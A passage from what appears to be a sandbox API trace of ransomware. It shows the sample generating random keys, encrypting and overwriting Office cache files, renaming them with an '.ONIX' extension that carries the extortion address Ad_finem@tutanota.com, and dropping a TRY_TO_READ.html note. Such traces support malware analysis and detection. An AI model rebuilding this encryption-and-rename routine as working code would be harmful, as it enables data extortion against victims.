SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", dwFileAttributes=0x80) returned 1 [0091.436] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 78 [0091.436] GetProcessHeap () returned 0x410000 [0091.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0091.436] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" [0091.436] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0091.436] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2865664) returned 1 [0091.436] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2bba00 [0091.436] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0091.436] GetProcessHeap () returned 0x410000 [0091.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0091.436] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0091.436] WriteFile (in: hFile=0x480, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0091.450] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0091.451] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0091.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2bba00) returned 0x3680020 [0091.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2bba00) returned 0x3940020 [0091.453] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.453] ReadFile (in: hFile=0x480, lpBuffer=0x3680020, nNumberOfBytesToRead=0x2bba00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x2bba00, lpOverlapped=0x0) returned 1 [0091.675] UnlockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2bba00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0091.675] CloseHandle (hObject=0x480) returned 1 [0091.712] GetProcessHeap () returned 0x410000 [0091.712] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0091.712] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0091.715] GetProcessHeap () returned 0x410000 [0091.715] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0091.715] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0091.715] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0091.716] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0091.717] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0091.717] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.718] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0091.718] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.719] GetLastError () returned 0x0 [0091.720] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x480 [0091.731] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.732] LockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc72, nNumberOfBytesToLockHigh=0x0) returned 1 [0091.732] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.732] ReadFile (in: hFile=0x480, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0091.733] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.733] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.734] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0091.734] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0091.734] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", dwFileAttributes=0x80) returned 1 [0091.734] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 78 [0091.734] GetProcessHeap () returned 0x410000 [0091.734] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0091.734] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0091.734] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0091.734] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3186) returned 1 [0091.735] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xc72 [0091.744] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0091.744] GetProcessHeap () returned 0x410000 [0091.744] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0091.744] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0091.744] WriteFile (in: hFile=0x480, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0091.746] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0091.747] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0091.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc72) returned 0x4b5b28 [0091.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc72) returned 0x4b67a8 [0091.750] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.750] ReadFile (in: hFile=0x480, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0xc72, lpOverlapped=0x0) returned 1 [0091.752] SetFilePointer (in: hFile=0x480, lDistanceToMove=-3186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.752] WriteFile (in: hFile=0x480, lpBuffer=0x4b67a8*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b67a8*, lpNumberOfBytesWritten=0x367f44c*=0xc72, lpOverlapped=0x0) returned 1 [0091.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0091.754] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b67a8 | out: hHeap=0x410000) returned 1 [0091.754] UnlockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc72, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0091.754] CloseHandle (hObject=0x480) returned 1 [0091.756] GetProcessHeap () returned 0x410000 [0091.756] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0091.756] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0091.757] GetProcessHeap () returned 0x410000 [0091.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0091.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0091.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0091.757] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0091.758] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0091.758] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0091.758] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.758] GetLastError () returned 0x0 [0091.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48df08 [0091.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4b2770 [0091.758] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x480 [0091.758] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.758] LockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x106f, nNumberOfBytesToLockHigh=0x0) returned 1 [0091.758] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.758] ReadFile (in: hFile=0x480, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0091.761] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.761] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.762] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0091.762] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0091.762] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0091.762] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0091.762] GetProcessHeap () returned 0x410000 [0091.762] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0091.762] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0091.762] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0091.762] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4207) returned 1 [0091.762] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x106f [0091.762] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0091.762] GetProcessHeap () returned 0x410000 [0091.762] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0091.762] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0091.762] WriteFile (in: hFile=0x480, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0091.764] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0091.765] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0091.766] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106f) returned 0x4b5b28 [0091.766] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106f) returned 0x4b6ba0 [0091.766] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.766] ReadFile (in: hFile=0x480, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x106f, lpOverlapped=0x0) returned 1 [0091.766] SetFilePointer (in: hFile=0x480, lDistanceToMove=-4207, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.766] WriteFile (in: hFile=0x480, lpBuffer=0x4b6ba0*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6ba0*, lpNumberOfBytesWritten=0x367f44c*=0x106f, lpOverlapped=0x0) returned 1 [0091.767] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0091.767] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6ba0 | out: hHeap=0x410000) returned 1 [0091.767] UnlockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x106f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0091.767] CloseHandle (hObject=0x480) returned 1 [0091.769] GetProcessHeap () returned 0x410000 [0091.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0091.769] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0091.771] GetProcessHeap () returned 0x410000 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0091.771] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bf60d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.771] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.771] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0091.771] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.771] GetLastError () returned 0x0 [0091.772] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bf60d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0091.772] CloseHandle (hObject=0x3cc) returned 1 [0091.772] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.772] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x1f, wMilliseconds=0xe2)) [0091.772] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0091.772] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0091.772] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0091.773] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0091.773] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0091.773] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.773] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.773] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x461440 [0091.773] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0091.773] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4584a0 | out: hHeap=0x410000) returned 1 [0091.773] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472050 | out: hHeap=0x410000) returned 1 [0091.773] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e9f0 [0091.774] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.774] RtlAllocateHeap (HeapHandle=0x410000, 